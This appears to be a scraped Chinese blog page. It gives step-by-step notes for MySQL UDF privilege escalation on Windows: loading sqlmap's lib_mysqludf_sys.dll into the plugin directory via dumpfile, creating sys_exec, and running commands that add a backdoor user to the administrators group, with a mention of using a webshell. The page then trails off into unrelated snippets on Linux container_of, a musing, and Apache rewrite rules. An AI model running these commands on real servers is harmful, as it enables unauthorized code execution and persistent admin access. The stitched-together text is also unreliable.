看了太多資料,累壞了,先雜亂的放在這裡吧,回頭有時間再排版
一、window系統
1、從sqlmap中找到32為的lib_mysqludf_sys.dll (64位的我沒有測試成功)
選擇資料庫
use mysql;
建立資料表
createtablenpn(line blob);把
lib_mysqludf_sys.dll裡的內容寫入資料表
insertintonpnvalues(load_file('d:/lib_mysqludf_sys.dll'));
把資料表內的內容寫到lib_mysqludf_sys_32.dll裡面(其實這兩個dll是一樣的;)
select*frommysql.npnintodumpfile'd:/lib_mysqludf_sys_32.dll';
關鍵的一步:一定要把lib_mysqludf_sys_32.dll拷貝到mysql的plugin目錄下,這樣下面的命令才可以執行
createfunctionsys_execreturnsintegersoname'lib_mysqludf_sys_32.dll';
上面執行成功後,便可以對window做各種操作了:
selectsys_exec("net user npn npn12345678 /add");
selectsys_exec("net localgroup administrators npn /add");
2、如果不清楚mysql lib目錄可以登mysql執行
mysql> show variables like '%plug%';
3、mysql通過plugin可以擴充套件更多的功能.plugin相當於一種外掛程式,使用者可以根據自己的需要求開發各種
各樣的plugin來支援自定義的功能,比如儲存引擎,半同步複製,分割槽等等各種各樣的功能.
mysql伺服器的plugin可以分為兩類,一種是內建的plugin,一種是外部的plugin.內部的plugin主要是和
mysql伺服器一起分發的,使用者不需要額外干預.而外部的plugin是由使用者自行開發,實現某種特殊的功能.
可以通過 show plugins來檢視。如果library欄位為null,就表示為內建的plugin,否則為外部的plugin。
mysql> show plugins;
4、blob型別的字段用於儲存二進位制資料
mysql中,blob是個型別系列,包括:tinyblob、blob、mediumblob、longblob,這幾個型別之間的唯一區別是在儲存檔案的最大大小上不同。
mysql的四種blob型別
型別 大小(單位:位元組)
tinyblob 最大 255
blob 最大 65k
mediumblob 最大 16m
longblob 最大 4g
5、從mysql 5.1版本開始必須要把udf.dll檔案放到mysql安裝目錄下的lib\plugin資料夾下才能建立自定義函式,並且該目錄預設是不存在的,這就需要我們使用webshell找到mysql的安裝目錄,並在安裝目錄下建立lib\plugin資料夾,然後將udf.dll檔案匯出到該目錄即可。
6、mysql dumpfile 與 outfile 函式的區別
into outfile 函式會 在行末端寫入新行 更致命的 是會轉義換行符, 這樣的話2進製可執行檔案就會被破壞 ,
在匯出到 乙個txt檔案,事實上是可以完整匯出每行記錄的.這個很適合導庫,如果要匯出多行記錄,dumpfile是不行的 它只能匯出 一行資料!
into dumpfile 就能匯出 乙個完整能執行的2進製 檔案into dumpfile 函式不對任何列或行進行終止,也不執行任何轉義處理
7、檢視系統plugin的設定目錄;
select @@basedir; --獲取mysql安裝目錄;
show variables like "%plugin%"
二、linux:
2、進入檔案目錄,執行下面命令:
$ sudo ./install.sh
根據提示進行安裝
container of 的的的原理
另外一篇,同樣精彩,揭開linux核心中container of的神秘面紗 華清遠見嵌入式學院講師。在linux 核心中有乙個大名鼎鼎的巨集container of 這個巨集是用來幹嘛的呢?我們先來看看它在核心中是怎樣定義的。呵呵,乍一看不知道是什麼東東。我們先來分析一下container of p...
存在的就是合理的,發生的即是必然的。
筆者有時候會想,什麼是對,什麼是錯?對於追求某一件事情之前首先會考慮,為什麼我要做這件事情。所以經過自我分析和生活周邊環境的總結。我認為,對於乙個人來,這是在站在個體的角度上說。什麼是對的?就是你自己覺得是對的,它就是對的。不過這個只是你自己的想法。主觀上的正確,不代表客觀上也受到了別人的認可。就拿...
Apache的rewrite的重寫相關的引數
apache mod rewrite規則重寫的標誌一覽 使用mod rewrite時常用的伺服器變數 rewriterule規則表示式的說明 匹配任何單字元 chars 匹配字串 chars chars 不匹配字串 chars text1 text2 可選擇的字串 text1或text2 匹配0到1...